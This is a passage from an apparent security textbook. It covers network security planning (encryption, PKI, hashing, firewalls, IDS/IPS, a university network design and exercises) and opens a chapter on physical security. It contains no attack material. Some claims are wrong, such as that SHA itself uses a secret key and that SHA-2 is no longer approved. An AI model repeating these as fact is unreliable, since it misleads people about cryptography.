Hacking: intrusion prevention system, monitor alarm logs, antivirus software within Email package Wireless local users Confidentiality: WPA3 encryption Authentication: WPA3 authentication StudentScholastic Classroom software, Confidentiality: secure web Student_Files faculty & student (HTTPS), secure protocols (SSH, Faculty_Files storage SFTP). Authentication: single sign-on through TACACS Hacking: monitor logs Student_Register Payment card, Confidentiality: encrypted disks, Health_Service grade, health info secure web (HTTPS), VPN for health services. Authentication: public key infrastructure. Integrity: SHA-3 checksums on all info. Hacking: intrusion prevention system, monitor logs Faculty, classrooms, Confidentiality (instructor/employee employees computers): encrypted disks. Secure protocols: SSH. Hacking: antivirus software Student labs Hacking: recently imaged computers for labs.

8.3.1 Confidentiality Controls Encryption provides confidentiality, by transforming data into an unreadable form to anyone without access to the encryption key. Encryption is critical for safely sending credit card and other private information and securing organization secrets. The security of encryption algorithms depends heavily on both the length and complexity of the key (in bits) and the complexity and number of encryption algorithms performed (in rounds). Encryption algorithms are categorized into Secret-Key and Public-Key types. These encryption algorithms are then used in specific protocols to protect applications such as web, file transfer, remote login, etc. This section reviews the two types of encryption algorithms, introduces popular algorithms for each, and then reviews the encrypted application protocols.

8.3  Defining Controls

157

Secret Key Encryption  Both sender and receiver share a common, secret key. These encryption algorithms are very efficient and popular. The issue is how to share the common secret key without also telling others the key. Popular algorithms include [3, 6, 14]: • Advanced Encryption Standard (AES): This encryption standard is more secure than 3DES and sufficient to protect sensitive but unclassified U.S. government information. Key sizes include 128, 192, and 256 bits with 10–14 rounds of encryption. This block cipher separates data into fixed 128 bit or variable blocks, and each block in separately encrypted. Approved configurations include specific confidentiality modes. • Triple Data Encryption Standard (3DES): The 1977 DES algorithm is a block cipher with block sizes of 64 bits and 16 functions. A single DES encryption is regarded as insufficient, but when three DES operations use three different 56-bit keys, the result is safe encryption. The DES-EDE3 algorithm encrypts the plaintext packet using key 1, decrypts the result using key 2, and encrypts again using key 3, to obtain the ciphertext:

(

Ciphertext = Encrypt Key3,Decrypt ( Key 2,Encrypt ( Key1,Plaintext ) )

) (8.1)

• The EDE3 name is abbreviated from ‘Encrypt, Decrypt, Encrypt using 3 keys’. Other algorithms similarly abbreviated include: EEE3, EEE2, and EDE2. Certain versions are approved for various applications by NIST [14]. • International Data Encryption Algorithm (IDEA): A European encryption algorithm that uses a 128-bit key, meant to replace DES. • RC4 or ARC4: This is a Stream Cipher, where a key is used to generate a random bit pattern, which is exclusive-ORed (XOR) with the data. RC4 is used in SSL/TLS and WPA protocols. Public-Key Encryption  The sender and receiver keys are complimentary, but not identical. Every entity (person or organization) has their own public and private keys. The public key can be advertised to the world; the corresponding private key is never shared. The property of public-key encryption is that plaintext encrypted with public keys must be decrypted with private keys, and vice versa: plaintext encrypted with private keys must be decrypted with public keys:



Plaintext = Decrypt ( Key Pub ,Encrypt ( Key Priv ,Plaintext ) ))

(8.2)



Plaintext = Decrypt ( Key Priv ,Encrypt ( Key Pub ,Plaintext ) ))

(8.3)

Therefore, people who know your public key can send you encrypted messages which only you can read with your private key – which only you have access to. This is highly advantageous, because it eliminates the need to privately communicate a secret key between two users, which is a flaw of secret key encryption.

158

8  Planning for Network Security

However, public-key encryption is extremely processor-intensive. Thus, it is less attractive for large-scale encryption purposes, such as a file transfer or web session. Therefore, public-key encryption is used to encrypt only small amounts of data. For example, it is used in key exchange, to communicate a secret key to be used during one temporary communications session. Popular algorithms include: Diffie-Hellman, RSA (Rivest, Shamir, Adleman), El Gamal, and Elliptic Curve Cryptosystems [6]. NIST-approved algorithms include RSA and Elliptic Curve Digital Signature Algorithm (ECDSA) [16]. Quantum-Resistant Encryption  Quantum computers are the next generation super-computing power and the technique is still evolving. To prepare, the U.S. National Institute of Standards and Technology (NIST) is currently evaluating a set of encryption algorithms that will be quantum-safe. One approved algorithm is the CRYSTALS-Kyber algorithm, which requires relatively small encryption keys that two parties can feasibly exchange and a reasonable speed of operation [12]. It uses a Learning-With-Errors technique. CRYSTALS-Kyber key sizes are four times the length of AES key sizes, for roughly equivalent security on quantum computers (e.g., Kyber-768 approximates AES-192 security) [13]. Application protocols that support encryption include [3, 6]: • Secure Web (S-HTTP): Encrypts single web message(s). • Secure Web: HTTP over SSL (HTTPS): Protects a web session (or conversation) using the SSL/TLS protocol. • Secure Sockets Layer (SSL)/Transport Layer Security (TLS): provides confidentiality (key exchange, data encryption), integrity, and authentication (server and optional client). • Secure File Transfer Protocol (SFTP): Encrypted file transfer using the SSH protocol. • Secure Shell 2 (SSH2): Remote login to UNIX or LINUX systems. Supports configurable confidentiality (key exchange, data encryption), integrity (HMAC-­ SHA-­3, HMAC-MD5), and in the commercial version: authentication (public key certificates). • Email: Pretty Good Privacy (PGP): Users establish a web of trust, where they informally share public keys. The private key is stored on a disk drive, protected by a pass phrase. This protocol then supports configurable confidentiality (key exchange  =  RSA, data encryption  =  IDEA), integrity (MD5), authentication (public key certificates) and non-repudiation (digital signature). • Email: Secure/Multipurpose Internet Mail Extension (S/MIME): Enables the signing and encrypting of email and attachments, using encryption (3DES, ElGamal), integrity (SHA-1), authentication (public key certificates) and non-­ repudiation (digital signature). • Client/Server: Kerberos: This tool authenticates clients and servers, and supports confidentiality through key exchange and encryption. It is commonly used in the Windows, UNIX/LINUX and Mac networks, particularly for single sign­on environments. It is highly configurable, which may result in compatibility issues.

8.3  Defining Controls

159

• Virtual Private Network (VPN). VPN encrypts all application packets between two endpoints. Both endpoints need to be configured to support the VPN protocol. VPNs are easy to use and inexpensive, but can be more difficult to set up and troubleshoot. VPNs do not solve malware problems or unauthorized actions – they just encrypt them. • Often an organization’s router or firewall is a VPN endpoint, which decrypts the VPN messages. • IPSec Protocol: Supports an Authentication Header, which supports source authentication and integrity, or optionally an Encapsulating Security Payload (ESP), which provides authentication, integrity and confidentiality. The algorithms used are configurable and negotiated. • Point-to-Point Tunneling Protocol (PPTP): Provides encryption (RC4). • Wi-Fi Protected Access (WPA, WPA2, WPA3): Wireless Local Area Networks (WLAN) require a secure implementation. Every person who drives by your office potentially has access to your computer systems unless you have a well-­ configured WLAN that includes authentication and encryption. Early protocols, WEP and WPA, offered insufficient encryption, and each subsequent version WPA, WPA2, WPA3 – offers improved security. • WPA uses a 128-bit key and the MAC address to provide unique encryption per device [7]. The Temporal Key Integrity Protocol changes the key about every 10,000 packets. The key exchange process includes authentication of both client and access point. WPA2 uses AES encryption and includes optional security enhancements, including integration of Kerberos and Radius. • WPA3 is the newest, most secure option, and includes a personal and enterprise mode [18]. The personal mode improves encryption, even when users select poorer passwords, and provides Simultaneous Authentication of Equals (SAE), which protects against password guessing by authenticating both devices. Enterprise mode provides an optional mode that supports a 192-bit key length. WPA3 is backward compatible with WPA2 when so configured (but rejects WPA). Thus, WPA3 APs can interoperate with WPA2 devices, but with reduced security. • A good basic configuration description for wireless and other network devices can be found at: www.cisecurity.org/white-­papers/cis-­controls-­telework-­and-­ small-­office-­network-­security-­guide/.

8.3.2 Authenticity & Non-Repudiation Kerberos, discussed in the Confidentiality section, is also a key method of Authentication. Other authentication and non-repudiation techniques include [3, 6, 8]:

160

8  Planning for Network Security

Centralized Access Control supports centralized servers that authorize credentials and indicate access control capabilities for single-sign on. They can also provide accounting/audit service to track usage. Products include: RADIUS: Remote Access Dial-in User Service, and TACACS: Terminal Access Control Access, which is a family of products. Authentication is best performed using two-factor authentication or better. A second factor can include a token, such as smartcard, flash drive, or RSA flash drive that displays a synchronized random number. Other second factors can include biometrics or a SMS passcode, sent to a cell phone providing a one-time (or single use) password. Public Key Infrastructure (PKI) is a set of standards approved by the International Standards Organization (ISO). PKI provides an infrastructure to support confidentiality, integrity, authenticity and non-repudiation in a flexible, configurable way. Every user (e.g., John) of PKI must register with a Registration Authority, who verifies that entity’s identity. John then obtains a Digital Certificate, which is maintained with a Certificate Authority (CA). The Digital Certificate includes information about John, including his public key. When Joan wants to communicate with John, with assured authentication, Joan requests John’s Digital Certificate through the CA.  The CA is a trusted organization that effectively vouches for the John. When Joan has John’s public key, she can verify his digital signature and/or perform key exchanges with him. Digital Signatures provide non-repudiation for contractual compliance. To create a digital signature, a message is hashed for integrity. The hash is then encrypted using the sender’s private key. When the receiver receives the message-plus-­ encrypted-hash, they use the sender’s public key to decrypt the received hash. If the decrypted hash matches the hash calculated over the received message, then the message was authentically sent by the sender and not modified during transmission. The Digital Signature Standard is defined by NIST to use a 160-bit SHA hash and RSA or elliptic curve encryption. There are three NIST-approved digital signature algorithms: DSA (Digital Signature Algorithm), and public key encryption algorithms: RSA and ECDSA [16]. Digital Signatures approved by NIST that are quantum-safe include CRYSTALS-­ Dilithium, FALCON and SPHINCS+. CRYSTALS and FALCON are faster and more efficient and FALCON enables smaller signatures, when necessary. SPHINCS+ uses a different type of algorithm and thus provides diversity of algorithms [12].

8.3.3 Integrity Controls Hashing or Message Digests provide integrity, by adding a sophisticated form of checksum, which is calculated using a secret key and multiple, complex operations across each segment of a data stream. Algorithms recognized as safe include [3, 6]:

8.3  Defining Controls

161

Fig. 8.4  Secure message authentication code calculations

Secure Hash Algorithm (SHA): SHA incorporates a secret key into the hash algorithm. Figure 8.4 (top algorithm) shows that both the receiver and sender calculate the hash value (H) using a key (K) and the sender appends the hash to the data for transmission. The receiver compares the received and calculated hashes. Approved NIST hashing algorithms include SHA-3 versions: SHA3-224, SHA3-256, SHA3-384, and SHA3-512, where the number in the name reflects the hash size. Larger numbers also reflect higher security levels, and the 384 and 512 algorithms can also be used for larger packets (>264). SHA-3 supports higher level of security at increased efficiency compared to SHA-1 or SHA-2 (which are no longer approved). SHA is used by Digital Signatures [15]. Hashed Message Authentication Code (HMAC): An HMAC creates a hash based on the message concatenated with a secret key. (See Fig. 8.4.) The message and hash are transmitted to the remote side. The receiver also concatenates the secret key to the message to calculate a hash. The calculated hash is compared to the received hash. HMAC is used in IPsec, TLS/SSL, and SET protocols. Approved NIST algorithms include: Keyed-Hash Message Authentication Code (HMAC), KECCAK Message Authentication Code (KMAC) and CMAC Mode for Authentication (CMAC) [17]. Outdated algorithms include Message Digests: MD2, MD4, and MD5.

8.3.4 Anti-Hacker Controls Large organizations may have a dedicated Security Operations Center (SOC) that monitors for security issues 24 hours per day, 7 days per week, every day of the year [20]. Whether or not an organization has such full coverage, it is always important to have anti-hacker tools in a network. This section describes additional security controls. SC Magazine evaluates security products in their Product Section and is a great source for further information on specific products. Table  8.5 lists ranges of prices for products, as recently

162

8  Planning for Network Security

Table 8.5  Security products Product Application firewalls Types: database firewall, web firewall Authentication Types: flash drive token, RSA token, fingerprint, voice/facial recognition Email security mgmt. Endpoint security Mobile device security Risk & policy mgmt. Security information and event mgmt. (SIEM) Unified threat mgmt. (UTM) Virtual security solutions Types: cloud support, compliance, encrypted memory Vulnerability assessment tools

Price range $ $7000–41,000 $1.30–46 per user OR $650–11,000 per site $15 per user to $17,000 per site $20–93 per user $25–60 per user $485–45,000 per site OR $10–50 per endpoint $2000–$42,000 per site or per year $300–31,000 per unit $50 per virtual server to $64,000 per site $2500–40,000 per site

evaluated by SC Magazine. The remainder of this section describes simple/individual security components before building up to multi-featured tools (from SC Magazine [3, 6, 20]). Bastion host is a computer that is attack-resistant. All but the necessary applications are turned off, the security configuration is optimized, and the operating system and all applications are patched. Antimalware includes antivirus and usually antispyware, and is software that controls the content of applications/files entering the computer, controlling for malicious programs (or malware). Antimalware software can be configured as part of a sophisticated firewall, email server, and/or hosted on end-user machines. Data loss prevention (DLP) monitors, detects and reacts to abnormal behavior on servers to prevent suspect data transmissions. Incorporates policy-based controls to monitor behavior. Endpoint security features antimalware and firewall capabilities, but in addition this end-user product prevents data leakage by controlling access to files, folders and removable media. It may provide centralized control to automate enforcement and monitoring of organizational policies. Email security management tools, commonly implemented on an email server, supports antimalware, anti-phishing and spam control. They can encrypt email, enforce email policies for regulatory or internal compliance, and prevent data leakage in outgoing email. Mobile Devices and Bring Your Own Device (BYOD) are a threat since merging technologies, such as smartphones, lack maturity in regards to security. When mobile devices are used for both business and pleasure, these devices can expose the internal network to malware, and imperil confidential or proprietary secrets when

8.3  Defining Controls

163

company data is accessed. A secure policy is to insist that employees not use personal devices to access company data or company devices to access personal data. Mobile device security enforces organizational policy, such as applying authentication/password requirements, allowing viewing but no storing of company data, and forbidding or permitting only certain software installations. It also features antimalware, remote wiping, browser content filtering, and possibly two-factor authentication. Some versions enable the device to be split, using containers, to isolate personal and company data [9, 10]. A ‘container’ can encrypt the business side of the device, and enable secure wiping of that side only [10]. Event Logs are generated by applications, operating systems and other system software to issue a warning or error or record that an action was performed (e.g., clearing of log file). Logs are important to monitor to detect attacks or risky behavior. Operating systems allow the configuration of logs specifically for an organization (via enable/disable mechanisms). A large quantity of logs provides information in detecting and analyzing intrusions, but requires a large amount of storage. Regulations and standards such as HIPAA and PCI DSS require regular log monitoring. Security Information and Event Management (SIEM) tools assist in log reduction (or summarization), prioritization and correlation. In addition to saving administrator time daily in pouring over hundreds of logs, they collect metrics for risk purposes, generate reports for compliance and help in forensic analysis of log data. They may collect logs from user, server and/or network devices. Another form of this is Extended Detection and Response (XDR). Application Firewalls protect either a web server or database, by monitoring activity, detecting attacks and reporting on both. They are also useful in preventing data leakages and countering DDOS attacks. Web Gateway often protects user zones by restricting transmissions to unauthorized websites, caching frequent authorized websites, and tracking all accesses. Intrusion Prevention System (IPS) or Intrusion Detection System (IDS) is an advanced tool to recognize attack packets, actions or patterns. Detection systems log or report unsafe behavior to administrators, while prevention systems actually halt unsafe behavior. The major issue is whether unsafe behavior can be accurately determined. There are two ways that intrusion systems can be hosted in a network: • Network IDS/IPS: This is a networked device which examines packets traversing a network or zone for attacks, such as worms, viruses, or scanning attacks. A NIPS would block dangerous packets, while a NIDS would simply report or log unsafe packets for the administrator. • Host IDS/IPS: Examines actions or resources on one host computer or server for unusual or inappropriate behavior. For example, it may detect modification or deletion of special files. There are three ways for intrusion systems to find attacks. Attacks may be recognized via a signature-based algorithm, or exact pattern match. This is commonly used in antivirus software to match for a worm or virus. Statistical-based algorithms recognize deviations from a norm. For example, most work occurs from 8 AM-6 PM

164

8  Planning for Network Security

and high server uses at 3 AM in the morning could raise a red flag. Neural networks recognize deviations from patterns using a statistical-based algorithm combined with self-learning (or artificial intelligence). High security industries recognize that if network traffic volume for a particular type of data suddenly balloons to 10 times its normal volume, this is a sure sign that the event should be investigated right away. IDS/IPS tools must be properly configured by security staff to recognize attacks. This may be is difficult, since illegitimate behavior may look like abnormal but legal behavior. For example, heavy use of a server at 3 AM in the morning is normally unusual and potentially deviant, except maybe when a scheduled deadline occurs. Unified Threat Management (UTM) tools combine firewall, IPS, antivirus, spam/email protection, web content filtering, application control and VPN capabilities into one super-firewall device. Important concerns should be redundancy and bandwidth. It is prudent to restrict access to particular web sites, such as social and email sites, to minimize threats of malware. It is better yet to permit access to only a limited set of Internet sites. Vulnerability Management tools scan the network, hosts and operating systems for vulnerabilities, such as new services and devices (e.g., rogue access points), their versions and asset types, incorrect configurations, and unpatched software. With this information, vulnerability scanners may then estimate and prioritize risk (hopefully accurately). Periodic scans may be required by regulations and PCI DSS, but the Center for Internet Security (CIS) recommends continuous vulnerability management to minimize the possible window for attack [19]. Sophisticated tools will automatically run on schedule, update themselves for new vulnerabilities, and produce reports. Some tools may support automatic fixing of vulnerabilities. Restricted Devices, Restricted Services: One thing that vulnerability management may implement is monitoring that only permitted devices are connected and that those devices are properly configured, including their security profile and available applications. Penetration Testing is not a tool per se, but is a test performed by paid expert attackers, used to identify vulnerabilities in a network, beyond what vulnerability management tools can do. Penetration testers actually attempt to break into a network to access critical data or systems. Risk and Policy Management tools are database systems to support risk analysis, risk treatment, policy enforcement and incident tracking. The policy management aspect may track patch implementations and enforce/monitor other configuration policies on end-user and/or network devices. This may help in managing and reporting for regulatory compliance. Honeypot/Honeynet is a system or network that is meant to attract and catch attackers. A honeypot system has no other functions except for a special application which appears easy to break into. All traffic going to honeypot/net should be regarded as suspicious. Honeypots/nets are risky to implement because they must be carefully monitored; if this system is successfully penetrated, the attackers will have a convenient launching pad for further attacks.

8.4  Defining the Network Architecture

165

It is possible to hire or contract outside expertise services, particularly for small to medium sized businesses that lack IT and security expertise (from SC Magazine): Managed Security Service Providers (MSSP) is a basic service to help configure and manage networks for security. They can optimize compliance, identity and access management (IAM), technology replacement ad log/alarm maintenance. Managed Detection and Response (MDR) is a specialty service that use artificial intelligence (AI) to deal with AI threats and incidents. Services include threat hunting, detection and response; continuous monitoring, and guided remediation. Threat hunting proactively searches for threats by eliminating threats before an attack is launched. It includes recognizing abnormal network traffic or testing possible attack scenarios.

8.4 Defining the Network Architecture Now it is time to put all the pieces together. Figure 8.5 shows a diagram of a network, where different colors reflect confidentiality levels: black = proprietary or confidential, gray = privileged, and white = public. There are three zones: the Demilitarized Zone, where anyone can send us email, access our web, or translate Internet names to IP addresses; the Confidential Payment Card Zone, where we handle payment cards; and the Internal Network Zone, which is where our employees do their thing. Since this firewall supports three (or more) zones, it is a multi-­homed firewall. There is a screening device, a Border Router, which screens obvious attack packets. This allows our firewall (a ‘screened host’) to spend more time checking remaining, maybe-safe packets. A border router is a regular router put at the border between our

Fig. 8.5  Fundamental network architecture

166

8  Planning for Network Security

network and the Internet. It screens for illegal applications (port numbers), and invalid source and destination IP addresses, similarly to what is shown in Fig. 8.1. The firewall and Intrusion Prevention System (IPS) could be separate or a combined device. A Unified Threat Management device can do both functions. The firewall may perform circuit-level screening to verify proper connection sequencing, while the IPS searches throughout each packet for attack signatures (malware) and finds attack patterns across packets. An Intrusion Detection System (IDS) observes and reports attack packets in the Internal Network Zone. It cannot block packets, the way an IPS can. A system for logs is not shown in this figure. For secure networks, logs may be transmitted to a central database. In highly secure networks, the transmission lines for these logs would be separated from the regular network, to reduce the probability of a Denial of Service attack. It is also possible to have dual in-line firewalls, to doubly-screen input. For example, there could be border router, firewall, DMZ, firewall, Internal Network Zone. In this case of a screened subnet, packets going to the Internal Network Zone would pass through the DMZ, and be filtered through two (dual) sequential (in-line) firewalls. Figure 8.6 is an example of this. This configuration has the advantage of defense in depth and redundancy. Internet

Border Router

De-Militarized Zone: Email, Public Web, Public DNS

Wireless Net Zone Student Zone: Labs, Dorms

Privileged User Zone: Classroom, Faculty Terminals

Confidential Server Zone: Student Registration Health Services

Privileged Server Zone: StudentScholastic Student Files Faculty Files

Fig. 8.6  Network diagram for simplified university scenario (workbook exercise)

8.5  Advanced: How it Works

167

8.4.1 Step 5: Draw the Network Diagram It is now time to draw the complete network, so we can evaluate it for various paths of logical access. A Path of Logical Access is a diagram that shows where transactions can enter the system, where they are security-controlled, and where they are processed. Evaluating such paths can ensure there is sufficient defense in depth. A good text description explains why the network architecture is as shown and can further explain logical paths of access. The diagram can show separated or combined servers, and sensitivity, where servers are colored according to their sensitivity class: Green  =  Public, Yellow  =  Privileged, Red  =  Confidential, Purple = Proprietary – or the black-gray-white version used in this text. Figure 8.6 shows a simplified diagram for the university scenario. Six internal network zones are shown, and all servers are color-coded according to sensitivity. The servers are not broken out, but instead listed under their zone name. This diagram was drawn with Microsoft Visio, which offers easy diagraming capabilities providing a variety of network icons. The students and faculty in this network are free to access any web sites and open any email links, which makes network users highly likely to have malware. Therefore it is extremely important to separate even internal users from the data servers, which contain privileged or confidential information. The paths of logical access generally enter via the Internet, wireless network, student labs or faculty/classrooms. Notice that to get into the DMZ or student computer labs, packets traverse through one firewall. Filtering through two firewalls is required to enter either of the secure server zones or the faculty/classroom computers. Even internal users go through at least one firewall to get to secure servers. This is a traditional secure network. A next generation for network security is described in the chapter on Alternate Networks, which describes Zero Trust networks. Also, many organizations depend on cloud configurations, which is also described in that chapter. In the Workbook, Chap. 4 should include your network design, and Chap. 5 should include the firewall and router configurations. Professional network administration personnel should assist in configuring network equipment (firewall, routers) and virtual machines/servers, according to the requirements established in this chapter, and for ensuring additional network security.

8.5 Advanced: How it Works This chapter on Network Security is already very technical, but for those who plan on making a career in security, this advanced section will help to explain how different classes of firewalls work [6]. Figures 8.7a–d show four common configurations for increasingly secure firewalls.

168

8  Planning for Network Security

Fig. 8.7 (a) Packet filter. (b) Stateful Inspection. (c) Circuit-level firewall. (d) Application-level firewall or proxy server

The Packet Filter (Fig. 8.7a) filters according to TCP and IP addresses, as was shown in Fig. 8.1. The cigarette-looking thing below the firewall shows in black and white the amount of each packet that is evaluated by the firewall. In a Packet Filter, only the (black) TCP and IP packets headers are scanned, and the remainder of the packet, including the (white) application contents, is not filtered. The two ‘A’s shown on the terminal and host indicate that connection A is established between the terminal and host and the firewall does not participate in or track the connection status. Stateful Inspection (Fig. 8.7b) is an enhancement of Packet Filtering, since the firewall tracks the state of each connection. (Hence the ‘A’ now shows up in the firewall.) This means that the firewall can detect if an attacker spoofs a connection, by sending out-of-sequence packets, or sends data packets when no connection is established. The tracking of the connection status means that a little more of the TCP header is now investigated by the firewall, which means that a little more of the packet is shown in black. With the Circuit-Level Firewall (Fig. 8.7c), a connection is established between the terminal and the firewall, and a second is established between the firewall and the host. In this case, the network header is not only inspected, but it is also processed for even greater integrity. This additional processing means that fragmented packets are reassembled before being evaluated for malware and attacks. The Application-Level Firewall or Proxy Server (Fig. 8.7d) performs everything that the other firewalls do, but in addition checks through much of the application data. That is why the packet is mostly inspected (in black) with very little of the packet uninspected (in white). A network security design and implementation is not complete without a good test [7, 11]. After a network is configured, a network specialist should scan servers,

8.6 Questions

169

work stations, and control devices to determine service availability and vulnerabilities. Vulnerability scanners can scan for open services, recent patching, and configuration weaknesses. Firewalls and routers can be tested to ensure that filtering and logging occur as designed. Penetration testing uses hacker techniques to try to break into a network. The network should also adhere to policy and standards, such as the implementation and monitoring of network logs and proper reaction to events. Web servers require special testing to ensure that confidentiality, integrity, authentication and non-repudiation are all properly implemented. They should also be tested for attacks such as SQL injection, cross-site scripting, buffer overflows and proper data processing. These are further discussed in the section on Secure Software Development. Some regulations/standards require network testing. PCI DSS requires quarterly scans and annual audits, as does the American regulation:  FISMA.  Sarbannes-­ Oxley requires regular audits, of which penetration testing should be a component.

8.6 Questions 1. Vocabulary. Match each meaning with the correct vocabulary. Virtual server Public key SQL attack Nonrepudiation Digital signature Secure hash Honeypot

Hypervisor Public key encryption Targeted attack Authenticity Digital certificate Bastion host Demilitarized zone

Confidential Payment Card Zone Secret key encryption Man-in-the-middle attack Intrusion prevention system Virtual private network Public key infrastructure Unified threat management

(a) An attack oriented toward a specific victim. (b) A device or software that provides firewall, antivirus and spam filter security functionality. (c) An exploit that manipulates web form input to alter database commands. (d) A service which verifies an entity’s identity and provides digital certificate information about the entity. (e) A sophisticated algorithm, calculated over a set of data, provides a result which ensures that the data is not modified in transmission or during storage. (f) A security goal where the sender cannot deny sending a message. (g) This information provides authentication data about an entity, as well as their public key. (h) A hash, encrypted with a private key, serves as a method of nonrepudiation. (i) A section of the network configured specifically to attract and catch attackers. (j) A method of encryption where the sender and receiver share an identical key.

170

8  Planning for Network Security

(k) A method of encryption where the sender and receiver use complimentary non-identical keys. (l) A security goal where the claimed sender is the actual sender. (m) An attacker pretends to be a desired computer network destination. (n) A method of consolidating services, by allocating different services onto a single physical server. Each service has its own operating system. (o) The software interface between a virtual machine’s operating system and the operating system or hardware associated with the physical machine. (p) An encryption key that is freely distributed to others. (q) A sophisticated tool that recognizes and mitigates attack packets, actions and patterns. (r) A segment of the network partitioned by a firewall for use by the general public. (s) A segment of the network partitioned by a firewall to handle debit and credit card handling. (t) A configuration where all packets are encrypted between two endpoints. (u) An attack-resistant computer with an optimized security configuration. 2. Security Design Principles. How does the design for Einstein University implement the following security design principles: separation of domains, isolation, encapsulation, modularity, least privilege, simplicity of design, and minimization of implementation? For each, give an example of how the technique is used, either from Chap. 7, or this chapter. 3. Workbook Solution for Specific Industry. Consider an industry you currently work in or would like to work in. Assume the company is in your geographical region. You may use the Security Workbook, Network Security Chapter to complete the tables. For each table, include five or more services. (a) Create a ‘Sources and Destinations for Services’ Table, similar to Table 8.1. (b) Create a ‘Service Classifications and Roles’ Table, similar to Table 8.2. (c) Create a Zones Table, similar to Table 8.3. (d) Create a ‘Controls for Services’ Table, similar to Table 8.4. (e) Design a Network Diagram, similar to Figs. 8.5 or 8.6. 4. Activity Diagram. Draw a flow chart or activity diagram showing the stages of an attack. Sample Activity Diagrams include Figs. 5.8, 6.4 and 7.3. Figure 4.1 is an informal diagram. 5. PoS Infection Example. Describe a sample scenario of how a criminal cyber team might remotely attack a Point of Sale device. (a) What stages might this criminal team pursue, and what would the goals and objectives of each phase be? (b) What security design weaknesses may help the criminal team during the attack? Discuss how a lack of security design principles in the network architecture, including separation of domains, isolation, encapsulation, modularity and least privilege, would make this attack easier. 6. Virtual Machines. Virtual Machines are traditionally used to separate one server from another. How could a VM could also protect users’ computers from infected

References

171

email and web accesses, while still enabling some storage from email/web? Consider how this could be implemented. 7. Product Evaluation. Select one security product to evaluate: Firewall, IDS/IPS, an encryption package, or antivirus software. Look up different websites for this one security product, and select three products to evaluate. What security services do they appear to provide and for what price? 8 . Regulation relating to Network Security. Consider one of the security regulations from your home country or from one of the following American security regulations or standards: HIPAA, Gramm–Leach–Bliley, Sarbanes–Oxley, PCI DSS, or FISMA. What requirements do they have related to Network Security? Some websites provide government- or standards-based information, and thus are authentic sources of information. Consider these sites: (a) HIPAA/HITECH: www.hhs.gov (Health and Human Services) or Chap. 19 ( b) Gramm–Leach–Bliley/Red Flags Rule: www.business.ftc.gov (Federal Trade Commission) (c) Sarbanes–Oxley: www.isaca.org or www.sans.org (Organizations for standards/ security) (d) PCI DSS: www.pcisecuritystandards.org: Requirements and Security Assessment Procedures v. 4.0 (e) FISMA: www.nist.gov (National Institute for Standards and Technology)

8.6.1 Health First Case Study Problems For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor or can be found at https://sn.pub/lecturer-material. Case study Planning for network security

Health first case study √

Other resources Security workbook

References 1. Crowley S (2014) Obama’s speech on N.S.A.  Phone Surveillance (transcript). New  York Times, 17 Jan 2014 2. Verizon (2013) Verizon 2013 data breach investigations report. http://www.verizonenterprise. com/DBIR/2013. Accessed 20 Oct 2013 3. Stallings W, Brown L (2012) Computer security: principles and practice, 2nd edn. Pearson Education, Inc, Upper Saddle River, pp 248–277, 623–726 4. Verizon (2014) Verizon 2014 data breach investigations report. http://www.verizonenterprise. com/DBIR/2014. Accessed 30 June 2014 5. PCI Security Standards Council (2013) Requirements and security assessment procedures, ver 3.0, Nov 2013. www.pcisecuritystandards.org

172

8  Planning for Network Security

6. Harris S (2013) All-in-one CISSP® exam guide, 6th edn. McGraw-Hill Co., New  York, pp 800–843, 853–864 7. Walker M (2012) CEH™ certified ethical hacker all-in-one exam guide. McGraw-Hill Co., New York, pp 274–279 8. Stephenson P (2014) Product section: authentication. SC Mag 25(1):36–47 9. Sutherland C, Halle H, Boroff B (2013) Inside, outside, upside-down: staying ahead of the threat, wherever it is. In: Plenary, SC congress Chicago, IL, 20 Nov 2013 10. Kolappon R (2013) Security content in the changing landscape of the mobile enterprise. In: SC congress Chicago, 20 Nov 2013 11. ISACA (2010) CISA review manual 2011. ISACA, Arlington Heights, pp 320–326, 337–342 12. NIST (2022) NIST Announces First Four Quantum-Resistant Cryptographic Algorithms, July 05, 2022, U.S. National Institute of Standards and Technology. from: https://www.nist.gov/news-events/news/2022/07/ nist-announces-first-four-quantum-resistant-cryptographic-algorithms 13. PQ-Crystals (2020) CRYSTALS: Cryptographic Suite for Algebraic Lattices. Dec 23, 2020. https://pq-crystals.org/kyber/index.shtml 14. NIST (2020) Block Cipher Techniques. June 22, 2020. https://csrc.nist.gov/projects/ block-cipher-techniques 15. NIST (2020b) Hash Functions. June 22, 2020. https://csrc.nist.gov/projects/hash-functions 16. NIST (2020c) Digital Signatures. June 22, 2020. https://csrc.nist.gov/projects/digital-signatures 17. NIST (2020d) Message Authentication Codes. June 22, 2020. https://csrc.nist.gov/projects/ message-authentication-codes 18. Olenick D (2018) Wi-Fi Alliance issues WPA3 standard to improve wireless security. SC Magazine, June 26, 2018. From: https://www.scmagazine.com/news/content/ wi-fi-alliance-issues-wpa3-standard-to-improve-wireless-security. 19. CIS (nodate) The 18 CIS Critical Security Controls, version 8, from: https://www.cisecurity. org/controls/cis-controls-list, taken Aug. 27, 2022. 20. SANS (2020) from: https://www.sans.org/reading-room/whitepapers/cloud/state-cloudsecurity-results-2020-cloud-security-survey-40095

Chapter 9

Designing Physical Security

In 1983, the French embassy in Moscow discovered the KGB planted bugs in its teleprinters, which had relayed all their incoming and outgoing telegrams to the Soviets for six years. – [1, page 69] A U.S. sweep of the Moscow embassy in 1945 had turned up a staggering 120 hidden microphones, planted in the legs of newly delivered tables and chairs, plaster, everywhere….In 1945, Soviet schoolchildren had presented the American ambassador with an elaborate hand-carving of the Great Seal of the United States. The carving hung in the ambassador’s home office for seven years, until U.S. officials discovered a tiny bug-called “Golden Mouth”-hidden deep in the wood that allowed the Soviets to eavesdrop on the ambassador at will. – Nicole Perlroth, author, They Tell Me This Is How The World Ends, and NY Times cybersecurity writer [1, page 70]

Physical security may be overlooked because it is not as complex or interesting as technology security. Assets are things of value, and may include computer devices, equipment, and/or files, or non-computer devices, equipment, paper files – or other things of value: money, checks, art, chemicals, prototypes, ideas on boards. Of organization-­reported security breaches, one major cause involves lost, misdelivered or stolen media, documents, and faxes  [2]. Skimmers remain a concern for Point of Sale and ATM machines. All of these physical issues involve or could involve data breaches, protected by law or PCI DSS. The Sensitivity and Criticality classes have served us well in other chapters, simplifies security designs, and deserves to be used here too. It is always a good idea to draw out a map, showing the sensitivity of various rooms. In Step 2, we consider and plan confidentiality/integrity controls for rooms containing sensitive materials or devices, and in Step 3 we consider critical resources, to improve availability.

